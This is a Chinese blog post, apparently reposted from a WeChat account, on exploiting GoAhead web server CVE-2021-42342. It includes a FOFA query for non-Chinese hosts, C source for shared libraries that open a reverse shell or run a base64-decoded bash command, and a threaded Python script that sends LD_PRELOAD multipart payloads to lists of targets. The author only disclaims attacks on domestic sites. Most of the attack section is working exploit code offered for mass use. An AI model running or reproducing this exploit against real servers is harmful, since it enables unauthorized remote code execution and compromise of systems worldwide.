0x01 goahead漏洞介绍
CVE-2021-42342
2、影响版本
GoAhead web-server=4.x
5.x<=GoAhead web-server<5.1.5
3、fofa
app="Goahead" && country!="CN"
1、编译命令
gcc -s -shared -fPIC ./name.c -o name.so2、制作反弹shell的so文件
char *server_ip="ip";uint32_t server_port=5555;static void zhrmghgws(void) __attribute__((constructor));static void zhrmghgws(void){int sock = socket(AF_INET, SOCK_STREAM, 0);struct sockaddr_in attacker_addr = {0};attacker_addr.sin_family = AF_INET;attacker_addr.sin_port = htons(server_port);attacker_addr.sin_addr.s_addr = inet_addr(server_ip);if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)exit(0);dup2(sock, 0);dup2(sock, 1);dup2(sock, 2);execve("/bin/bash", 0, 0);}
3、制作命令执行的so文件
static void zhrmghgws(void) __attribute__((constructor));static void zhrmghgws(void){system("bash -c '{echo,bash编码值}|{base64,-d}|{bash,-i}'");}
0x03 漏洞利用
1、执行编写好的脚本
2、脚本批量
#!/usr/bin/env python# -*- encoding: utf8 -*-from crypt import methodsimport refrom types import SimpleNamespaceimport requestsfrom bs4 import BeautifulSoupimport base64import warningsimport randomimport sysimport socketimport osimport argparseimport threadingfrom urllib.parse import urlparse, ParseResultimport jsonimport urllib3import urllibimport queueimport sslimport stringfrom time import sleepurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)#搜索存活主机purp = '33[95m'blue = '33[94m'red = '33[31m'yellow = '33[93m'green = '33[96m'end = '33[0m'def title():print("""_______ ________ ___ ___ ___ __ _ _ ___ ____ _ _ ___/ ____ / / ____| |__ / _ __ /_ | | || |__ |___ | || |__| | / /| |__ ______ ) | | | | ) || |______| || |_ ) | __) | || |_ ) || | / / | __|______/ /| | | |/ / | |______|__ _/ / |__ <|__ _/ /| |____ / | |____ / /_| |_| / /_ | | | |/ /_ ___) | | |/ /______| / |______| |____|___/____||_| |_|____|____/ |_|____|www.bolean.com.cn""")print('''批量访问模式:python3 cve-2021-42342.py -f XXX.txt -t threads单一访问模式:python3 cve-2022-42342.py -u http://xxx.comauthor:thRee''')q_file = queue.Queue()q_path = ["cgi-bin/index"]PAYLOAD_MAX_LENGTH = 16384 - 200def genRandomString(slen=10):return ''.join(random.sample(string.ascii_letters, slen))def color(info):return "[" + info + "]"def put_queue(file_apth, q):with open(file_apth, 'r', encoding='utf8') as f:while True:row = f.readline()if not row:returnq.put_nowait(row)def get_queue(q):passdef exploit(client, parts: ParseResult, payload: bytes):path = '/' if not parts.path else parts.pathboundary = '----%s' % str(random.randint(1000000000000, 9999999999999))padding = 'a' * 2000content_length = min(len(payload) + 500, PAYLOAD_MAX_LENGTH)data = fr'''POST {path} HTTP/1.1Host: {parts.hostname}Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Connection: closeContent-Type: multipart/form-data; boundary={boundary}Content-Length: {content_length}--{boundary}Content-Disposition: form-data; name="LD_PRELOAD";/proc/self/fd/7--{boundary}Content-Disposition: form-data; name="data"; filename="1.txt"Content-Type: text/plain#payload#{padding}--{boundary}--'''.replace('n', 'rn')data = data.encode().replace(b'#payload#', payload)client.send(data)resp = client.recv(20480)resp = resp.decode()return data,resp,pathdef requ(url,payload): # 请求目标urlfor path in q_path:if url[:4] != 'http':uroo = "http://" + url + "/" + pathurooo = "https://" + url + "/" +pathur = [uroo,urooo]else:uroo = url + "/" + pathur = [uroo]for uri in ur:try:if len(payload) > PAYLOAD_MAX_LENGTH:raise Exception('payload size must not larger than %d', PAYLOAD_MAX_LENGTH)parts = urlparse(uri)port = parts.portif not parts.port:if parts.scheme == 'https':port = 443else:port = 80context = ssl.create_default_context()with socket.create_connection((parts.hostname, port), timeout=8) as client:if parts.scheme == 'https':with context.wrap_socket(client, server_hostname=parts.hostname) as ssock:print(ssock)resp1=exploit(ssock, parts, payload)print("OK",uri)else:print(client)resp1=exploit(client, parts, payload)print("[-]",uri)except Exception as ex:passprint(uri)def run(url=None):if not url:while not q_file.empty():try:with open("name.so", 'rb') as f:payload = f.read()requ(q_file.get_nowait().strip(),payload)except Exception as e:pass#print("[-]ERROR:" , str(e),url)returnelse:with open("name.so", 'rb') as f:payload = f.read()requ(url,payload)if __name__ == '__main__':title()parser = argparse.ArgumentParser(description="cve-2021-42342")parser.add_argument('-u', '--url', type=str, help="url")parser.add_argument('-f', '--file', type=str, help="url file path")parser.add_argument('-t', '--threading', type=int, help="threading", default=5)args = parser.parse_args()if args.file:put_queue(args.file, q_file)th = args.threadingts = []for n in range(th):t = threading.Thread(target=run)t.start()ts.append(t)for t in ts:t.join()elif args.url:run(url=args.url)
看了一下tw,别人验证漏洞存不存在的时候扫描了一万个,一个都没中。。。
这洞感觉也就自我安慰一下,利用条件太苛刻,我还没批量跑过。
这里有片P牛写的踩坑文章可以看一下。
https://www.leavesongs.com/PENETRATION/goahead-en-injection-cve-2021-42342.html
老规矩,禁止在未授权的情况下对国内网站进行漏洞利用测试,我不负刑事责任,跟我没有任何关系!
end
下期预告
欢迎投稿并加入我们,请联系公众号:Golden-Qianjiang
原文始发于微信公众号(金色钱江):Goahead的Nday漏洞复现利用及批量
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论